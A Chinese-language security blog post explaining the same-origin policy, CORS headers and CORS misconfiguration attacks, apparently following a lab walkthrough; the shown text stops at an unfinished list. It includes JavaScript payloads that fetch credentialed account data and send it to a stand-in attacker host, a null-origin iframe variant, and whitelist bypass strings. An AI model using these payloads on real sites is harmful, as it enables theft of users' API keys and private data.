<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="且将新火试新茶，诗酒趁年华">
    <meta name="author" content="Drunkbaby">
    
    <title>
        
            利用CORS进行攻击 |
        
        Drunkbaby&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"drun1baby.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true},"style":{"primary_color":"#0066cc","logo":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/logo.png","favicon":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png","avatar":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png","font_size":"15px","font_family":null,"hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"header_transparent":true,"background_img":"/images/bg.svg","description":"且将新火试新茶，诗酒趁年华","font_color":null,"hitokoto":false},"scroll":{"progress_bar":true,"percent":false}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":false},"comment":{"enable":true,"use":"valine","valine":{"enable":true,"appid":"mCIu9X4iLP3I0GikUoetB9bV-9Nh9j0Va","appkey":"ermlV1eoB1YODT088EdXjo6C","placeholder":"just go go","background":"/images/comment_bg.png","count":true},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.8"},"waline":{"server_url":null,"reaction":false,"version":2}},"post":{"author_label":{"enable":true,"auto":true,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"enable":true,"wordcount":true,"min2read":true},"img_align":"left","copyright_info":true},"version":"3.6.1"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/logo.png">
                </a>
            
            <a class="logo-title" href="/">
               Drunkbaby&#39;s Blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            <div class="article-title">
                <span class="title-hover-animation">利用CORS进行攻击</span>
            </div>

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">Drunkbaby</span>
                            
                                <span class="author-label">Lv6</span>
                            
                        </div>
                        <div class="meta-info">
                            
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2021-12-21 09:39:56</span>
        <span class="mobile">2021-12-21 09:39</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-03-26 10:49:21</span>
    </span>
    
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/web%E5%AE%89%E5%85%A8/">web安全</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>2.7k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>11 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                

                <span id="more"></span>
<h1 id="利用CORS进行攻击"><a href="#利用CORS进行攻击" class="headerlink" title="利用CORS进行攻击"></a>利用CORS进行攻击</h1><h2 id="0x01-什么是CORS以及CORS问题出现的起因"><a href="#0x01-什么是CORS以及CORS问题出现的起因" class="headerlink" title="0x01 什么是CORS以及CORS问题出现的起因"></a>0x01 什么是CORS以及CORS问题出现的起因</h2><ul>
<li>CORS全称：Cross-origin resource sharing，它是一种浏览器机制，它允许对位于给定域外部的资源进行受控访问。如果配置不当则可能遭受跨域的攻击。并且该机制并不能用来抵御CSRF攻击。</li>
</ul>
<blockquote>
<p>思索一下，如果伪造Origin之后，我们是不是就可以通过跨站、伪造Origin来获取其他网站的资源了？所以有了SOP的出现</p>
</blockquote>
<h3 id="1-SOP-Same-origin-policy-的出现"><a href="#1-SOP-Same-origin-policy-的出现" class="headerlink" title="1.SOP(Same-origin policy)的出现"></a>1.SOP(Same-origin policy)的出现</h3><blockquote>
<p>一句话概括一下什么是同源策略(SOP):</p>
<p>同源：协议、域名、端口都相同。非同源的资源之间不能互相通信</p>
</blockquote>
<p>SOP用来防止网站互相攻击，它通常允许一个域向其他域发出请求，但不允许访问响应。</p>
<p>同源策略限制一个源上的脚本访问来自另一个源的数据。源由URL方案、域和端口号组成。</p>
<ul>
<li>例如以下的URL：</li>
</ul>
<pre class="line-numbers language-none"><code class="language-none">http:&#x2F;&#x2F;normal-website.com&#x2F;example&#x2F;example.html<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>​	此URL使用了HTTP协议，域为normal-website.com，端口号为80，我们通过下面这个表格对比理解什么样算同源，什么样的不算。</p>
<table>
<thead>
<tr>
<th>访问的URL</th>
<th>是否允许访问？</th>
</tr>
</thead>
<tbody><tr>
<td><a class="link"   target="_blank" rel="noopener" href="http://normal-website.com/example/" >http://normal-website.com/example/<i class="fas fa-external-link-alt"></i></a></td>
<td>允许(相同的协议、域、端口号)</td>
</tr>
<tr>
<td><a class="link"   target="_blank" rel="noopener" href="http://normal-website.com/example2/" >http://normal-website.com/example2/<i class="fas fa-external-link-alt"></i></a></td>
<td>允许(相同的协议、域、端口号)</td>
</tr>
<tr>
<td><a class="link"   target="_blank" rel="noopener" href="https://normal-website.com/example/" >https://normal-website.com/example/<i class="fas fa-external-link-alt"></i></a></td>
<td>拒绝(不同的协议、端口号)</td>
</tr>
<tr>
<td><a class="link"   target="_blank" rel="noopener" href="http://en.normal-website.com/example/" >http://en.normal-website.com/example/<i class="fas fa-external-link-alt"></i></a></td>
<td>拒绝(不同的域)</td>
</tr>
<tr>
<td><a class="link"   target="_blank" rel="noopener" href="http://www.normal-website.com/example/" >http://www.normal-website.com/example/<i class="fas fa-external-link-alt"></i></a></td>
<td>拒绝(不同的域)</td>
</tr>
<tr>
<td><a class="link"   target="_blank" rel="noopener" href="http://normal-website.com:8080/example/" >http://normal-website.com:8080/example/<i class="fas fa-external-link-alt"></i></a></td>
<td>拒绝(不同的端口号)</td>
</tr>
</tbody></table>
<p>​	但是在IE中，同源策略只考虑协议和域，不考虑端口号，所以最后一个在IE中是允许访问的。</p>
<h4 id="1-1-为什么需要同源策略"><a href="#1-1-为什么需要同源策略" class="headerlink" title="1.1 为什么需要同源策略"></a>1.1 为什么需要同源策略</h4><p>​	当浏览器将HTTP请求从一个源发送到另一个源时，与另一个域相关的任何Cookie作为请求的一部分发送，容易产生<strong>安全问题</strong>。</p>
<h4 id="1-2-如何实现同源策略"><a href="#1-2-如何实现同源策略" class="headerlink" title="1.2 如何实现同源策略"></a>1.2 如何实现同源策略</h4><p>​	同源策略通常控制JS代码对跨域加载的内容的访问，通常允许页面资源的跨域加载。虽然SOP允许页面加载外部资源，但是不允许页面上的JS代码读取这些资源的内容，不过SOP也有一些例外的情况。</p>
<ul>
<li><p>有些对象跨域不可读但是可写，例如iframes或新窗口的location对象或locaation.href属性。</p>
</li>
<li><p>有些对象可读但不可写，例如window对象的length属性和close属性。</p>
</li>
<li><p>replace函数通常可以被称为location对象上的跨域。</p>
</li>
<li><p>可以跨域调用某些函数，比如可以在新窗口调用close、blur、focus函数，postMessage函数也可以在iframes和新窗口上调用来从一个源向另一个源发送消息。</p>
<p>​	由于版本问题，虽然不同子域属于不同源但是也允许访问所有子域，通常可以使用HttpOnly cookie标志位来缓解这一风险，可以使用document.domain来放宽SOP，当且仅当该属性是完全限定域名(FQDN)时才允许你为一个指定域放宽SOP。</p>
</li>
</ul>
<blockquote>
<p>很明显能看到，SOP的策略相当严格，不同源之间的合理通信也会受到限制。</p>
<p>由此，出现了放宽同源策略，这也就是CORS的前世今生。</p>
</blockquote>
<h4 id="1-3-放宽同源策略——-CORS的前世今生"><a href="#1-3-放宽同源策略——-CORS的前世今生" class="headerlink" title="1.3 放宽同源策略——-CORS的前世今生"></a>1.3 放宽同源策略——-CORS的前世今生</h4><p>​	从上面来看，同源策略是非常严格的，所以又设计了一些方法来放宽这些限制。使用跨域资源共享就可以放宽这些限制。它会定义一些HTTP头部字段，用来规定可信的Web源及相关属性，例如是否允许经过身份验证的访问。</p>
<h3 id="2-CORS以及Access-Control-Allow-Origin-ACAO-响应头"><a href="#2-CORS以及Access-Control-Allow-Origin-ACAO-响应头" class="headerlink" title="2.CORS以及Access-Control-Allow-Origin(ACAO)响应头"></a>2.CORS以及Access-Control-Allow-Origin(ACAO)响应头</h3><h4 id="2-1-什么是ACAO响应头"><a href="#2-1-什么是ACAO响应头" class="headerlink" title="2.1 什么是ACAO响应头?"></a>2.1 什么是ACAO响应头?</h4><p>​	该响应头包含在发往异源的响应包中，并标识请求允许的来源。浏览器将其与请求的来源进行匹配，如果相同则允许访问响应。</p>
<h4 id="2-2CORS的简单实现"><a href="#2-2CORS的简单实现" class="headerlink" title="2.2CORS的简单实现"></a>2.2CORS的简单实现</h4><pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">GET &#x2F;data HTTP&#x2F;1.1
Host: robust-website.com
Origin : https:&#x2F;&#x2F;normal-website.com

The server on robust-website.com returns the following response:

HTTP&#x2F;1.1 200 OK
...
Access-Control-Allow-Origin: https:&#x2F;&#x2F;normal-website.com<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>​	从响应来看，因为存在ACAO头，所以这个源是允许的。</p>
<ul>
<li>如果设置 Access-Control-Allow-Origin:*，则允许所有域名的脚本访问该资源。</li>
<li>Access-Control-Allow-Origin:<a class="link"   target="_blank" rel="noopener" href="http://www.phpddt.com.com,允许特定的域名访问./" >http://www.phpddt.com.com,允许特定的域名访问。<i class="fas fa-external-link-alt"></i></a></li>
</ul>
<p> 如PHP添加响应头信息：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token number">1.</span> <span class="token function">header</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Access-Control-Allow-Origin: *"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="2-3-使用ACAO凭证处理CORS"><a href="#2-3-使用ACAO凭证处理CORS" class="headerlink" title="2.3 使用ACAO凭证处理CORS"></a>2.3 使用ACAO凭证处理CORS</h4><p>​	一般情况下，是不包含任何凭证发送跨域资源请求的。但是如果需要开启，可以通过添加响应头<code>Access-Control-Allow-Credentials</code>，并将其设置为true来开启。</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">GET &#x2F;data HTTP&#x2F;1.1
Host: robust-website.com
...
Origin: https:&#x2F;&#x2F;normal-website.com
Cookie: JSESSIONID&#x3D;&lt;value&gt;

And the response to the request is:

HTTP&#x2F;1.1 200 OK
...
Access-Control-Allow-Origin: https:&#x2F;&#x2F;normal-website.com
Access-Control-Allow-Credentials: true<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>开启以后，浏览器就被允许读取带有凭证的跨域请求的响应了。</p>
<h4 id="2-4-使用通配符放宽CORS规范"><a href="#2-4-使用通配符放宽CORS规范" class="headerlink" title="2.4 使用通配符放宽CORS规范"></a>2.4 使用通配符放宽CORS规范</h4><p>​	就是我们前面说到的设置ACAO头为”*”</p>
<p>​	通配符不能与其他字符混用，只能单独就一个通配符。通配符还不能与Access-Control-Allow-Credentials共用。</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h4 id="2-5-在获取资源前使用Options请求进行检查"><a href="#2-5-在获取资源前使用Options请求进行检查" class="headerlink" title="2.5 在获取资源前使用Options请求进行检查"></a>2.5 在获取资源前使用Options请求进行检查</h4><p>​	代码如下：之前我本人在挖src的时候也遇到过这种情况</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">OPTIONS &#x2F;data HTTP&#x2F;1.1
Host: &lt;some website&gt;
...
Origin: https:&#x2F;&#x2F;normal-website.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: Special-Request-Header<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>​	表明询问是否可以使用PUT方法和自定义头部字段Special-Request-Header发送跨域请求。然后我们得到这样的响应包。</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">HTTP&#x2F;1.1 204 No Content
...
Access-Control-Allow-Origin: https:&#x2F;&#x2F;normal-website.com
Access-Control-Allow-Methods: PUT, POST, OPTIONS
Access-Control-Allow-Headers: Special-Request-Header
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 240<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>​	看到返回了一个允许的请求方法列表，并且看得到是支持那个自定义头部字段的。</p>
<blockquote>
<p> CORS不能够用来防御CSRF</p>
</blockquote>
<h2 id="0x02-进入正题，利用CORS进行攻击"><a href="#0x02-进入正题，利用CORS进行攻击" class="headerlink" title="0x02 进入正题，利用CORS进行攻击"></a>0x02 进入正题，利用CORS进行攻击</h2><h3 id="1-CORS配置出现的漏洞"><a href="#1-CORS配置出现的漏洞" class="headerlink" title="1.CORS配置出现的漏洞"></a>1.CORS配置出现的漏洞</h3><h4 id="1-1服务器端生成-来自客户端指定的Origin头的ACAO头"><a href="#1-1服务器端生成-来自客户端指定的Origin头的ACAO头" class="headerlink" title="1.1服务器端生成,来自客户端指定的Origin头的ACAO头"></a>1.1服务器端生成,来自客户端指定的Origin头的ACAO头</h4><p>​	有的应用程序需要允许来自多个指定域的资源，但是维护这样的一个列表很麻烦。有种方法是从请求中读取Origin头并且在响应包中包含一个响应头。用来说明请求源被允许</p>
<p>例如Request请求：</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">GET &#x2F;sensitive-victim-data HTTP&#x2F;1.1
Host: vulnerable-website.com
Origin: https:&#x2F;&#x2F;malicious-website.com
Cookie: sessionid&#x3D;...<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>返回Response</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">HTTP&#x2F;1.1 200 OK
Access-Control-Allow-Origin: https:&#x2F;&#x2F;malicious-website.com
Access-Control-Allow-Credentials: true
...<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>因为响应包中是包含Origin头的，说明请求源是被允许的并且允许包含cookie。而且还能看出是允许来自任意来源的。所以我们可以跨域访问资源，这样我们就可以访问一些带有敏感信息的资源了，payload:</p>
<pre class="line-numbers language-JavaScript" data-language="JavaScript"><code class="language-JavaScript">var req &#x3D; new XMLHttpRequest();
req.onload &#x3D; reqListener;
req.open(&#39;get&#39;,&#39;https:&#x2F;&#x2F;vulnerable-website.com&#x2F;sensitive-victim-data&#39;,true);
req.withCredentials &#x3D; true;
req.send();

function reqListener() &#123;
location&#x3D;&#39;&#x2F;&#x2F;malicious-website.com&#x2F;log?key&#x3D;&#39;+this.responseText;
&#125;;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<ul>
<li>有基础Origin映射的CORS漏洞</li>
</ul>
<img src="/2021/12/21/%E5%88%A9%E7%94%A8CORS%E8%BF%9B%E8%A1%8C%E6%94%BB%E5%87%BB/find.png" class="">

<p>看到apikey是利用这段代码获取的，于是我们向这个路径发出请求观察一下响应包</p>
<img src="/2021/12/21/%E5%88%A9%E7%94%A8CORS%E8%BF%9B%E8%A1%8C%E6%94%BB%E5%87%BB/send.png" class="">	

<p>发现响应包主体就是用户的一些信息，还有一个表明可以读取响应中的凭证的CORS响应头，然后我们测试一下是否可以向任何域发起跨域请求。</p>
<img src="/2021/12/21/%E5%88%A9%E7%94%A8CORS%E8%BF%9B%E8%A1%8C%E6%94%BB%E5%87%BB/origin.png" class="">

<p>发现响应头包含了该域，表明我们可以向任意域发起跨域请求，所以我们可以这样构造payload:</p>
<pre class="line-numbers language-JavaScript" data-language="JavaScript"><code class="language-JavaScript">&lt;script&gt;
   var req &#x3D; new XMLHttpRequest();
   req.onload &#x3D; reqListener;
   req.open(&#39;get&#39;,&#39;$url&#x2F;accountDetails&#39;,true);
   req.withCredentials &#x3D; true;
   req.send();

   function reqListener() &#123;
       location&#x3D;&#39;&#x2F;log?key&#x3D;&#39;+this.responseText;
   &#125;;
&lt;&#x2F;script&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="1-2利用解析Origin标头时的攻击"><a href="#1-2利用解析Origin标头时的攻击" class="headerlink" title="1.2利用解析Origin标头时的攻击"></a>1.2利用解析Origin标头时的攻击</h4><ul>
<li>例如：有些程序将Origin通过白名单的方式进行请求，如下面的Request请求</li>
</ul>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">GET &#x2F;data HTTP&#x2F;1.1
Host: normal-website.com
...
Origin: https:&#x2F;&#x2F;innocent-website.com<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>Response响应</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">HTTP&#x2F;1.1 200 OK
...
Access-Control-Allow-Origin: https:&#x2F;&#x2F;innocent-website.com<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>但是设置白名单还是会有问题，有的应用程序还允许访问请求源的子域。一般采取匹配前缀或后缀以及正则匹配的方式进行验证，这就很容易导致夹带恶意域进去</p>
<pre class="line-numbers language-NONE" data-language="NONE"><code class="language-NONE">normal-website.com
hackersnormal-website.com
normal-website.com.evil-user.net  &#x2F;&#x2F; 类似这类Origin也可以绕过<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="1-3被认为是白名单的Origin值为Null"><a href="#1-3被认为是白名单的Origin值为Null" class="headerlink" title="1.3被认为是白名单的Origin值为Null"></a>1.3被认为是白名单的Origin值为Null</h4><ul>
<li><p>Origin是支持Null值的，有些情况下的Origin值为Null</p>
<p>​	跨站的重定向</p>
<p>​	来自序列化数据的请求</p>
<p>​	使用file协议的请求</p>
<p>​	沙箱过的跨域请求</p>
<p>有时候为了方便开发，会将null的Origin值加入白名单</p>
</li>
</ul>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">GET &#x2F;sensitive-victim-data
Host: vulnerable-website.com
Origin: null<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>对应的 Response</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">HTTP&#x2F;1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>以沙箱中的<code>Origin:null为例</code>payload:</p>
<pre class="line-numbers language-JavaScript" data-language="JavaScript"><code class="language-JavaScript">&lt;iframe sandbox&#x3D;&quot;allow-scripts allow-top-navigation allow-forms&quot; src&#x3D;&quot;data:text&#x2F;html,&lt;script&gt;
var req &#x3D; new XMLHttpRequest();
req.onload &#x3D; reqListener;
req.open(&#39;get&#39;,&#39;vulnerable-website.com&#x2F;sensitive-victim-data&#39;,true);
req.withCredentials &#x3D; true;
req.send();

function reqListener() &#123;
location&#x3D;&#39;malicious-website.com&#x2F;log?key&#x3D;&#39;+this.responseText;
&#125;;
&lt;&#x2F;script&gt;&quot;&gt;&lt;&#x2F;iframe&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<blockquote>
<p>以靶场为例子</p>
</blockquote>
<img src="/2021/12/21/%E5%88%A9%E7%94%A8CORS%E8%BF%9B%E8%A1%8C%E6%94%BB%E5%87%BB/apikey_code.png" class="">

<p>尝试<code>Origin :null</code>的绕过</p>
<img src="/2021/12/21/%E5%88%A9%E7%94%A8CORS%E8%BF%9B%E8%A1%8C%E6%94%BB%E5%87%BB/origin_null.png" class="">

<p>发现能够成功发包，直接套payload</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>iframe</span> <span class="token attr-name">sandbox</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>allow-scripts allow-top-navigation allow-forms<span class="token punctuation">"</span></span> <span class="token attr-name">srcdoc</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>&lt;script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get','$url/accountDetails',true);
  req.withCredentials = true;
  req.send();
  function reqListener() &#123;
    location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
  &#125;;
&lt;/script><span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>iframe</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="2-利用CORS执行的攻击"><a href="#2-利用CORS执行的攻击" class="headerlink" title="2.利用CORS执行的攻击"></a>2.利用CORS执行的攻击</h3><h4 id="2-1利用CORS执行XSS"><a href="#2-1利用CORS执行XSS" class="headerlink" title="2.1利用CORS执行XSS"></a>2.1利用CORS执行XSS</h4><p>Request请求</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">GET &#x2F;api&#x2F;requestApiKey HTTP&#x2F;1.1
Host: vulnerable-website.com
Origin: https:&#x2F;&#x2F;subdomain.vulnerable-website.com
Cookie: sessionid&#x3D;...<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>Response回应</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">HTTP&#x2F;1.1 200 OK
Access-Control-Allow-Origin: https:&#x2F;&#x2F;subdomain.vulnerable-website.com
Access-Control-Allow-Credentials: true<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>通过回显出来的URL进行攻击</p>
<pre class="line-numbers language-none"><code class="language-none">subdomain.vulnerable-website.com

https:&#x2F;&#x2F;subdomain.vulnerable-website.com&#x2F;?xss&#x3D;&lt;script&gt;cors-stuff-here&lt;&#x2F;script&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h4 id="2-2由于CORS配置不当引起TLS的中断"><a href="#2-2由于CORS配置不当引起TLS的中断" class="headerlink" title="2.2由于CORS配置不当引起TLS的中断"></a>2.2由于CORS配置不当引起TLS的中断</h4><p>如果使用HTTPS传输的站点将使用HTTP传输的站点加入了可信源，像这样</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">GET &#x2F;api&#x2F;requestApiKey HTTP&#x2F;1.1
Host: vulnerable-website.com
Origin: http:&#x2F;&#x2F;trusted-subdomain.vulnerable-website.com
Cookie: sessionid&#x3D;...

HTTP&#x2F;1.1 200 OK
Access-Control-Allow-Origin: http:&#x2F;&#x2F;trusted-subdomain.vulnerable-website.com
Access-Control-Allow-Credentials: true<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>Response回应</p>
<pre class="line-numbers language-HTTP" data-language="HTTP"><code class="language-HTTP">HTTP&#x2F;1.1 200 OK
Access-Control-Allow-Origin: http:&#x2F;&#x2F;trusted-subdomain.vulnerable-website.com
Access-Control-Allow-Credentials: true<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>​	在此情况下，能够拦截受害用户流量的攻击者可以利用CORS配置破坏受害人与应用程序的交互。此攻击涉及以下步骤：</p>

            </div>

            
                <div class="post-copyright-info">
                    
<div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li class="post-title">
            <span class="type">本文标题</span>：<span class="content">利用CORS进行攻击</span>
        </li>
        <li class="post-author">
            <span class="type">本文作者</span>：<span class="content">Drunkbaby</span>
        </li>
        <li class="post-time">
            <span class="type">创建时间</span>：<span class="content">2021-12-21 09:39:56</span>
        </li>
        <li class="post-link">
            <span class="type">本文链接</span>：<span class="content">2021/12/21/利用CORS进行攻击/</span>
        </li>
        <li class="post-license">
            <span class="type">版权声明</span>：<span class="content">本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！</span>
        </li>
    </ul>
    <div class="copy-copyright-info flex-center tooltip" data-content="复制版权信息" data-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/web%E5%AE%89%E5%85%A8/">#web安全</a>&nbsp;
                        </li>
                    
